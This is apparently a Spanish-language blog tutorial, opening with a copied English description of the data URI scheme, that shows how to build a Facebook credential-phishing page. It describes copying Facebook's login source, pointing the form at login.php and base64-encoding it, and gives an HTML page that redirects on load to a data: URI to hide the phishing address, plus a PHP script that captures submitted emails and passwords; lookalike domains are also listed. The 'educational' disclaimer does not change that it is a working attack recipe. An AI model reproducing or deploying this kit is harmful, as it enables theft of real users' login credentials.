Data_URI_scheme
The data URI scheme is a URI scheme (Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources. This technique allows normally separate elements such as images and style sheets to be fetched in a single HTTP request rather than multiple HTTP requests, which can be more efficient.
Data URIs tends to be simpler than other inclusion methods, such as MIME with cid or mid URIs. Data URIs are sometimes called Uniform Resource Locators, although they do not actually locate anything remote. The data URI scheme is defined in RFC 2397 of the Internet Engineering Task Force (IETF).
In browsers that fully support Data URIs for "navigation", JavaScript generated content can be provided as file "download" to the user, simply by setting window.location.href to a Data URI. One example is the conversion of HTML tables to downloadable CSV using a Data URI like this: 'data:text/csv;charset=UTF-8,' + encodeURIComponent(csv), where "csv" has been generated by JavaScript.
The IETF published the data URI specification in 1998[1] as Proposed Standard on the IETF Standards Track, and hasn't progressed it since. The HTML 4.01 specification refers to the data URI scheme,[2] and data URIs have now been implemented in most browsers.
Si lo se esta en ingles, este texto lo ley varias veces hasta entenderlo por desgracia no lo logre al 100% solo un pequeño porcentaje, pero es curioso su funcionamiento, vamos mejor a un ejemplo:
https://www.facebook.com/
tenemos facebook una red social, afortunadamente cuando accedemos a la pagina podemos ver su estructura, es decir como esta formado facebook en su codigo fuente Ctrl + U en tu navegador
podemos editar algo de su codigo fuente ya que nuestro navegador lo esta mostrando, un action="login.php"
ahora solo nos queda ver en como entra en accion esto, tenemos nuestro codigo fuente editado ahora solo falta convertirlo a base64
tenemos una muy buena online para jugar un rato con los tipos de encriptacion
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiIgaWQ9ImZhY2Vib bla bla bla
bien llegamos a la parte mas importante como elaboramos un exploit que aproveche el Data_URl_scheme, algunos conoceran que cuando se ingresa una url directamente http://www.facebook.com se entiende que es la pagina principal, a menos que se halla atacado con pharming el nombre de dominio sera el real, pero cuando se ataca con phishing se corren riesgos como que se tiene que hacer parecer el nombre de dominio lo mejor posible
http://www.1facebook.com/
http://facebook.freehostia.com/
http://faceeeebok.t35.com/
etc... estos ejemplos los encontramos muy a menudo en la actualidad, que pasa cuando unimos el Data URl y html
< html >
< head >
< title >PAGINA FALSA!!!!!</ title >
</head>
< body onload="javascript:window.location='data:text/html;base64,ACA VA NUESTRO CODIGO BASE64'" >
<!-- EDUCATIVO -->
</body>
</html>
podemos unir javascript, html y Data URl para poder falsear un poco el nombre de la direccion de phishing
< html >
< head >
< title >PAGINA FALSA!!!!!</ title >
</head>
< body onload="javascript:window.location='data:text/html;base64,ACA VA NUESTRO CODIGO BASE64'" >
<!-- EDUCATIVO -->
</body>
</html>
podemos unir javascript, html y Data URl para poder falsear un poco el nombre de la direccion de phishing
lo que sucedera cuando se acceda a ese archivo html es que se redireccionara a una pagina nueva con un enlace data:
ahora solo los faltaria el archivo que capturara los datos
login.php
<?php
$email = $_POST["email"];
$pass = $_POST["pass"];
$contenido = "
email : $email\n
clave : $pass
Pwn3d!!!!!!
";
print $contenido;
?>
ahora cuando ingresen los datos los recibiremos en nuestro script login.php ya cada cual sabra el funcionamiento o que le agregara, recuerda que esto solo es educativo y yo al igual que tu estoy aprendiendo solo comparto algo de conocimiento de lo que se, se que el texto puede contener errores pero no me juzzgues muy duro xD.
La forma de comprender las cosas aveces es experimentando, puedes ver mas a fondo como funciona esto consultando o practicando tu mismo.
Links
https://isc.sans.edu/diary/%22Data%22+URLs+used+for+in-URL+phishing/13996
http://www.breakthesecurity.com/2012/09/phishing-site-using-data-uri-hack.html
http://www.youtube.com/watch?v=Zlk76Oqw7Oo
"La curiosidad no puede tratarse como un delito"
3p1c0w3nd
No hay comentarios:
Publicar un comentario